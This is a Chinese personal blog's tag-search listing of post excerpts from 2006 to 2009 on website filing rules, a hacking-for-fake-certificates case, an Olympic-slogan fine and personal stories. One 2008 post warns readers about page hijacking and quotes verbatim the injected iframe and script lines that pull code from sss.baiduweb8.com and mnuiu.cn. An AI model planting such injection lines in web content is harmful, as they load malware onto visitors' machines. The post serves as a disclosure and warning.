标签搜索“网站”,搜索结果的全部文章

  我早就说过,中国是一个无可救药的国家,生活在这个国度的人们,每天都生活在水深火热之中,我今天就因为网站ICP备案的事情出离愤怒了!

  网站ICP备案这档子事,好像是从2005年开始的,出于好奇,当时我有的几个小站,都申请了备案,速度也挺快,几天就下来了,然后按照规定放到网页的底部,感觉也不错,好像自己的网站获得国家承认了,显得正规了一样。那时就觉得这个备案网站做的真烂,既难看又难用,不过政府网站那时候都是这么个德行。

  ……

  阅读全文

发布日期:2009-09-20 | 创建者:东风破 | 分类:默认分类 | 评论(0)

  齐鲁晚报消息:大学生侵入政府网站办假证涉案金额超百万

  本报济南9月9日讯 本报8月26日A07版以《假证贩掏钱,黑客让其假证变”真”》为题,报道了我省首例”黑客”与假证贩子共谋案宣判的消息。

  ……

  阅读全文

发布日期:2009-09-10 | 创建者:东风破 | 分类:文摘撷萃 | 评论(0)

  工信部近日下发了《关于集中开展全量网站清理及备案专项行动的通知》,通知要求各家ISP(互联网服务提供商)必须于2月24日16:00前关闭所有尚未获得备案号的存量网站。以下为通知全文:

  根据工信部及上级部门要求,集中开展全量网站备案工作,清理整顿未备案网站。现要求各电信运营商、ISP按照以下要求完成所有网站的备案工作,同时将所有尚未获得备案号的网站进行关闭处理。

  严格要求所有ISP完成全量网站的备案工作,必须在获得备案号后再进行接入,任何没有获得备案号的网站一律不得接入,一旦发现将采取严厉的惩罚措施。对应现将具体要求及相关工作通知如下:

  一、关闭所有尚未获得备案号的存量网站

  各家ISP必须于2月24日16:00前关闭所有尚未获得备案号的存量网站,并保证在获得备案号前一律不得擅自接入。若发现ISP所接入的网站尚未获得信息准确无误的备案号,一经查明将立即收回该网站IP,同时追究ISP责任。

  二、所有新增网站必须获取备案号后方可接入

  自即日起,各家ISP在获得网站备案号后方可对所发展的客户进行接入服务,若发现ISP擅自接入尚未获得备案号的网站将采取严厉惩罚措施,一经查明将立即收回该网站IP,同时追究ISP责任。

  三、将对违反上述规定的ISP采取严厉的惩罚措施

  一旦发现ISP违反上述规定者,将依据情节严重程度对ISP进行暂停IDC机房进出工单处理、终止原有合同、依法转交司法机关予以处理等惩罚处置。

  于是,就有了下面的故事……

  ……

  阅读全文

发布日期:2009-03-01 | 创建者:东风破 | 分类:文摘撷萃 | 评论(0)

  标题:网站打出”奥运加油 中国加油”被罚1万元

  来源: 京华时报 2008-12-01

  原文链接:http://epaper.jinghua.cn/html/2008-12/01/content_370772.htm

  本报讯(记者王秋实)因为在网站上打出“奥运加油,中国加油”字样,中国财政经济出版社被海淀工商分局以侵犯奥林匹克标志专有权为由处以罚款1万元。出版社将海淀工商分局起诉到法院要求撤销处罚。近日,此案在海淀法院开庭审理。

  中国财政经济出版社的代理人李轩律师称,今年8月7日,北京奥运会开幕前夕,出版社为了表达爱国情怀和对北京奥运会的良好祝愿,在本社的官方网站上打出“奥运加油,中国加油”字样。8月19日,他们接到海淀工商分局的通知,称该行为侵犯了奥林匹克标志专有权,涉嫌违法。9月27日,海淀工商分局做出行政处罚决定,责令出版社立即停止侵权行为并处以罚款1万元。

  出版社认为,他们的行为是善意的,没有任何商业目的和不良后果。海淀工商既未听取其申辩意见,也未举行听证,就做出行政处罚决定,属于认定事实不清,适用法律和定性错误,行政处罚的事实和法律依据不足,因此请求法院判决予以撤销。

  海淀工商分局称,“奥运”属于奥林匹克标志,虽然到被检查时,该出版社尚未因此取得违法所得,但仍属于未经许可为商业目的擅自使用奥运标志,因为网页上除了“奥运加油,中国加油”字样,同时还有企业名称、经营项目等信息,具有潜在商业目的。此外,按照行政处罚听证的有关规定,低于3万元的罚款额度并不需要召开听证会,工商局的处罚程序并不违法。因此请求法院维持这份处罚决定。

  此案没有当庭宣判。

发布日期:2008-12-01 | 创建者:东风破 | 分类:文摘撷萃 | 评论(0)

  最近我怀疑自己得了一种病,这种病的具体表现如下:

  1、每天需要登录五个以上的邮箱,看看是否有新的邮件,虽然大部分时候都没有,即使有也是垃圾邮件或广告邮件。

  2、每天都要打开QQ、MSN、Skype、飞信、Google Talk……等等,至少三种以上即时通讯工具,且每天在线时间超过十小时,虽然其实很少聊天。

  3、每天都要登录某几个网站看二十篇以上的新闻或八卦,包含它们附带的网友评论,其实大部分时候主要是看评论,现在的网友评论越来越有才了,高人层出不穷,比网站编辑水平强多了。

  ……

  阅读全文

发布日期:2008-09-09 | 创建者:东风破 | 分类:人生记录 | 评论(0)

  现在看到早先那篇日志,觉得有点脸红,因为经过我孜孜不倦的研究,终于搞清楚某些网页源码顶部的恶意链接是从何而来了。

  我一开始认为是网站服务器被挂马,并且早上来到办公室上网,发现症状消失,于是便确信了自己的判断。可能黑客趁夜深人静的时候恶意挂马,白天就遁逃了。

  中午回到宿舍上网,发现症状又出现了,我开始怀疑自己先前的判断。

  是否和局域网有关呢?我上网搜索“sss.baiduweb8.com”和“Fuck Th3 W0rld”这两个关键词,才知道了一个词叫做ARP攻击。

  ……

  阅读全文

发布日期:2008-08-06 | 创建者:东风破 | 分类:技术研究 | 评论(0)

  本人在更换博客主题时发现本地效果与上传后的效果不一致,有错位现象,经多方查找,发现原来是页面顶端被人挂马了。

  本人赶紧查找原因,甚至把整个站下载下来一一分析,没有找到代码中挂马的地方。

  初步推断分析,一种原因可能是服务器被挂马,另外一种原因可能是运营商网络被挟持,联想到最近的路由器漏洞问题,这种可能性很大。

  然后本人又发现若干较有影响的知名站点也被挂马。

  如中国站长站:http://www.chinaz.com/

  在首页点鼠标右键,查看网页源代码,会发现最顶部被嵌入一行代码:“<iframe src=http://sss.baiduweb8.com/arp.htm width=10 height=1></iframe>”

  如cnbeta站,虽然主页面没有被挂马,但是有个广告框架页被挂马了:http://www.cnbeta.com/customad.htm

  该框架页位于cnbeta主页面顶部,被嵌入了这样一行代码:“<script src=http:\/\/www.mnuiu.cn\/ar.js><\/script><title>Fuck Th3 W0rld!</title>”

  还有其他若干站点也有类似遭遇,希望引起大家重视,查明原因。

发布日期:2008-08-06 | 创建者:东风破 | 分类:默认分类 | 评论(0)

  近来不太有时间写博客,也不太有时间写,今天整理文件,发现了几个大学时候的编程作品,都蛮有意思的,于是想跟大家分享一下。

  其中有两个是俄罗斯方块,两个不同时期的版本,第二个版本是在第一个版本的基础上修饰了一下界面,不过还未完成。

  还有一个不是游戏,而是个小工具,叫隐藏精灵,可以把桌面图标以及工具栏什么的都隐藏掉,整个桌面就剩一个壁纸,比较好玩。

  ……

  阅读全文

发布日期:2007-06-22 | 创建者:东风破 | 分类:默认分类 | 评论(0)

  大四快毕业的时候,我有一次看到一个征婚交友工作室的海报,主办方叫什么阿姨的,忘了,记得那个名字很炫……但确实是忘了。

  我闲来无事,就去看看。于是打电话问地址,在杆石桥那一站附近某个三楼的一个小房间,我于是登门拜访。

  那个某某阿姨和一个小伙子接待了我,给我讲了讲他们的工作室并展示了一下他们做的很粗糙的网站以后,就要我交钱入会,忘了他们当时要多少钱了,我说现在还不能决定,于是他们又让我看了看他们目前已有的会员,和一些自我介绍的录像片,有一些女生还不错。

  ……

  阅读全文

发布日期:2006-11-17 | 创建者:东风破 | 分类:默认分类 | 评论(0)
【共9条】第1页/共1 跳转
Copyright by 东风破. All Right Reserved. Powered by Spring Studio.
鲁ICP备05043973号